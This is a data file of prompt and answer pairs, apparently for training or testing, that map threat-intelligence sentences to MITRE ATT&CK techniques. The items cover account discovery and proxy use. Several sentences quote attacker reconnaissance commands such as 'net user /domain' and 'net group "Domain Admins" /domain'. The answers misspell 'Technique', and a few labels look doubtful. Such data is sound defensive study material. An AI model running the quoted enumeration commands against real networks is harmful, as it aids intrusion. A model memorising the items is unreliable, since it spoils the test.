+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell can browse the file system.,"Tecnique: T1083 File and Directory Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 obtained a list of users and their roles from an Exchange server using `Get-ManagementRoleAssignment`.","Tecnique: T1087 Account Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has enumerated all users and their roles from a victim's main treasury system.,"Tecnique: T1087 Account Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter listed all non-privileged and privileged accounts available on the machine.,"Tecnique: T1087 Account Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can identify administrator accounts on an infected machine.,"Tecnique: T1087 Account Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET attempts to discover accounts from various locations such as a user's Evernote, AppleID, Telegram, Skype, and WeChat data.","Tecnique: T1087 Account Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `net user` command to gather account information.","Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 used the commands net localgroup,net user, and net group to find accounts on the system.","Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.","Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 enumerated administrative users using the commands net localgroup administrators.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used built-in net commands to enumerate local administrator groups.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used net user for account discovery.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has accessed ntuser.dat and UserClass.dat on compromised hosts.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang performs account discovery using commands such as net localgroup administrators and net group ""REDACTED"" /domain on specific permissions groups.","Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff has collected the administrator username from a compromised host.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has run net user, net user /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to get account listings on a victim.","Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Poseidon Group searches for administrator accounts on both the local victim machine and the network.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used net user to conduct internal discovery of systems.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used net user to enumerate local accounts on the system.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 actors used the following commands following exploitation of a machine with LOWBALL malware to enumerate user accounts: net user >> %temp%\download net user /domain >> %temp%\download,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can collect account information from the victim’s machine.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot gathers domain and account names/information through process monitoring.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can identify administrator accounts on an infected host.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can enumerate the sessions for each user logged onto the infected host.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can identify users with local administrator rights.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie uses the net user command.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The discovery modules used with Duqu can collect information on accounts and permissions.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise executes net user after initial communication is made to the remote server.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can acquire local and domain user account information.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic gathers a list of all user accounts, privilege classes, and time of last logon.","Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GeminiDuke collects information on local user accounts from the victim.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperStack can enumerate all account names on a remote share.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has a command to list account information on the victim’s machine.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar gathers information on local groups and members on the victim’s machine.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of accounts with the command net users.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP has the capability to retrieve information about users on remote hosts.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan has run `C:\Windows\system32\cmd.exe /c cmd /c dir c:\users\ /s 2>&1` to discover local accounts.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type may create a file containing the results of the command cmd.exe /c net user {Username}.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Commands under net user can be used in Net to gather information about and manipulate user accounts.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo enumerates local and domain users,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can display the /etc/passwd file on a compromised host.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can retrieve usernames from compromised hosts.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY can gather user names.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has used the NetUserEnum function to enumerate local accounts.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can enumerate local and domain user account information.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.","Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA uses the net user command.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec can obtain a list of users.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has run the command `net user` on a victim.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHOTPUT has a command to retrieve information about connected users.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has used net.exe user and net.exe users to enumerate local accounts on a compromised host.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can collect usernames from the local system via net.exe user.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet enumerates user accounts of the local host.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot collects the users of the system.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can use net user to gather information about local accounts.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to enumerate local admin accounts.,"Tecnique: T1087.001 Account Discovery: Local Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `dsquery` and `dsget` commands to get domain environment information and to query users in administrative groups.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group queried compromised victim's active directory servers to obtain the list of employees including administrator accounts.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used the `net` command to retrieve information about domain accounts.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used PowerShell to discover domain accounts by exectuing `Get-ADUser` and `Get-ADGroupMember`.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used built-in net commands to enumerate domain administrator users.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used net user /domain to identify account information.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has has used net user /dom and net user Administrator to enumerate domain accounts including administrator accounts.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used batch scripts to enumerate users on a victim domain controller.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 can identify user accounts associated with a Service Principal Name and query Service Principal Names within the domain by utilizing the following scripts: `GetUserSPNs.vbs` and `querySpn.vbs`.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used the Softerra LDAP browser to browse documentation on service accounts.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang performs account discovery using commands such as net localgroup administrators and net group ""REDACTED"" /domain on specific permissions groups.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has used the AD Explorer tool to enumerate users on a victim's network.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used cmd.exe net user /domain to enumerate domain users.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has run net user, net user /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to get account listings on a victim.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Poseidon Group searches for administrator accounts on both the local victim machine and the network.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider leverages legitimate domain accounts to gain access to the target environment.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has run `net user %USER% /dom` for account discovery.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used net user /domain to enumerate domain accounts.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has run `net group /dom` and `net group ""Domain Admins"" /dom` in compromised environments for account discovery.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has identified domain admins through the use of `net group ""Domain admins"" /DOMAIN`. Wizard Spider has also leveraged the PowerShell cmdlet `Get-ADComputer` to collect account names from Active Directory data.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AdFind can enumerate domain users.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot gathers domain and account names/information through process monitoring.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar has the ability to identify domain administrator accounts.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can utilize `net use` commands to identify domain users.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can collect information about domain users, including identification of domain admin accounts.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use LDAP queries, `net group ""Domain Admins"" /domain` and `net user /domain` for discovery.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can determine if the user on an infected machine is in the admin or domain admin group.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can enumerate the domain user accounts on a targeted system.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can acquire local and domain user account information.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The IceApple Active Directory Querier module can perform authenticated requests against an Active Directory server.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID can query LDAP to identify additional users on the network to infect.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Net commands used with the /domain flag can be used to gather information about and manipulate user accounts on the current domain.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo enumerates local and domain users,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect user account information by running net user /domain or a series of other commands on a victim.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can enumerate local and domain user account information.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can use `System.Security.AccessControl` namespaces to retrieve domain user information.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can enumerate domain accounts via net.exe user /domain.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet enumerates user accounts of the domain.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot may use net group ""domain admins"" /domain to display accounts in the ""domain admins"" permissions group and net localgroup ""administrators"" to list local system administrator group membership.","Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to enumerate domain admin accounts.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: dsquery can be used to gather information on user accounts within a domain.,"Tecnique: T1087.002 Account Discovery: Domain Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider accessed Azure AD to identify email addresses.","Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used Powershell to discover email accounts.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team used malware to enumerate email settings, including usernames and passwords, from the M.E.Doc application.","Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea collects address book information from Outlook.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can execute an LDAP query to discover e-mail accounts for domain users.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed leveraging a module that can scrape email addresses from Outlook.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can parse Outlook .pst files to extract e-mail addresses.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can collect email accounts from Microsoft Outlook and Mozilla Thunderbird.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MailSniper can be used to obtain account names from Exchange and Office 365 using the Get-GlobalAddressList cmdlet.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ruler can be used to enumerate Exchange users and dump the GAL.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot collects email addresses from Outlook.,"Tecnique: T1087.003 Account Discovery: Email Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider accessed Azure AD to download bulk lists of group members and to identify privileged users, along with the email addresses and AD attributes.","Tecnique: T1087.004 Account Discovery: Cloud Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has conducted enumeration of Azure AD accounts.,"Tecnique: T1087.004 Account Discovery: Cloud Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can enumerate Azure AD users.,"Tecnique: T1087.004 Account Discovery: Cloud Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can enumerate IAM users, roles, and groups.","Tecnique: T1087.004 Account Discovery: Cloud Account, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROADTools can enumerate Azure AD users.,"Tecnique: T1087.004 Account Discovery: Cloud Account, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.","Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider installed the open-source rsocx reverse proxy tool on a targeted ESXi appliance.","Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location.","Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used a custom proxy tool called ""Agent"" which has support for multiple hops.","Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used a tool called CLASSFON to covertly proxy network communications.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used frp, ssf, and Venom to establish SOCKS proxy connections.","Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used a customized version of the Iox port-forwarding and proxy tool.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CopyKittens has used the AirVPN service for operational activity.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca adopted Cloudflare as a proxy for compromised servers.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has leverage NordVPN for its egress points when targeting intended victims.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used Fast Reverse Proxy (FRP) for RDP traffic.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoustachedBouncer has used a reverse proxy tool similar to the GitHub repository revsocks.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POLONIUM has used the AirVPN service for operational activity.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team's BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.","Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla RPC backdoors have included local UPnP RPC proxies.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used compromised devices and customized versions of open source tools such as Fast Reverse Proxy (FRP), Earthworm, and Impacket to proxy network traffic.","Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windigo has delivered a generic Windows proxy Win32/Glubteta.M. Windigo has also used multiple reverse proxy chains as part of their C2 infrastructure.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to use a reverse SOCKS proxy module.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred can utilize proxy for communications.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADCALL functions as a proxy server between the victim and C2 server.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can use SOCKS4 and SOCKS5 proxies to connect to actor-controlled C2 servers. BADHATCH can also emulate a reverse proxy on a compromised machine to connect with actor-controlled C2 servers.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has supported use of a proxy server.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can act as a reverse proxy.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can identify and use configured proxies in a compromised network for C2 communication.,"Tecnique: T1090 Proxy, Tactic: TA0011 Command and Control"
